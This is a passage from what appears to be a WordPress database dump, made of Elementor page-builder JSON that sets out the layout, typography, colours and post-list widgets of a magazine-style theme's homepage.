,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"someezc\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-carousel-slider-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1202,438,'_elementor_version','0.4'),(1203,438,'_elementor_css','a:3:{s:4:\"time\";i:1508883121;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1205,439,'_elementor_edit_mode','builder'),(1206,439,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},